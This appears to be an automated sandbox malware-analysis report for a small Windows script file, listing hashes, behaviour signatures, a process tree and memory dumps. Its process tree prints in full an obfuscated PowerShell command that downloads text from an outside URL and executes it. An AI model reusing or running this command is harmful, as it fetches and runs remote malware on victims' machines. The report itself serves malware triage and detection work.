Overview

overview

10

Static

static

1

doc20241402070611.wsf

windows7-x64

8

doc20241402070611.wsf

windows10-2004-x64

10

Analysis

  • max time kernel
    120s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    14/02/2024, 07:44

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    doc20241402070611.wsf

  • Size

    1KB

  • MD5

    1cef4895af813de334d132c8a8c4995a

  • SHA1

    540629b7bd97ee548300c9390b740f3d77449fd2

  • SHA256

    e749d258ab856425335b85c2a15a7902541e896431fd05725b1c35dff7b89d10

  • SHA512

    4c58be35b389ae6c2c036180271607de769e642a61611553998a5f9f3f0c492832c0ef1b4c624cbbff3d71e36284b857a8342ac3f6c048c67a1e2fc77a473666

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 21 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\doc20241402070611.wsf"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2180
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $rt='x','e','I';[Array]::Reverse($rt);sal z ($rt -join '');$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$tpg='[void','] [Syst','em.Refle','ction.Asse','mbly]::LoadWi','thPartialName(''Microsoft.VisualBasic'')';z($tpg -join '');do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty55='(New-','Obje','ct Ne','t.We','bCli','ent)';$tty=z($tty55 -join '');$tty;$rot='Down','load','Str','ing';$rotJ=($rot -join '');$bnt='https','://delp-heizungsbau.de/DT9.txt';$bntJ=($bnt -join '');$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,$rotJ,[Microsoft.VisualBasic.CallType]::Method,$bntJ);z($mv)
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2436

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • memory/2436-4-0x000000001B740000-0x000000001BA22000-memory.dmp

          Filesize

          2.9MB

          Download

        • memory/2436-5-0x0000000002040000-0x0000000002048000-memory.dmp

          Filesize

          32KB

          Download

        • memory/2436-6-0x000007FEF57D0000-0x000007FEF616D000-memory.dmp

          Filesize

          9.6MB

          Download

        • memory/2436-7-0x00000000028B0000-0x0000000002930000-memory.dmp

          Filesize

          512KB

          Download

        • memory/2436-8-0x00000000028B0000-0x0000000002930000-memory.dmp

          Filesize

          512KB

          Download

        • memory/2436-9-0x00000000028B0000-0x0000000002930000-memory.dmp

          Filesize

          512KB

          Download

        • memory/2436-10-0x000007FEF57D0000-0x000007FEF616D000-memory.dmp

          Filesize

          9.6MB

          Download

        • memory/2436-11-0x00000000028B0000-0x0000000002930000-memory.dmp

          Filesize

          512KB

          Download

        • memory/2436-12-0x000007FEF57D0000-0x000007FEF616D000-memory.dmp

          Filesize

          9.6MB

          Download

        • memory/2436-13-0x00000000028B0000-0x0000000002930000-memory.dmp

          Filesize

          512KB

          Download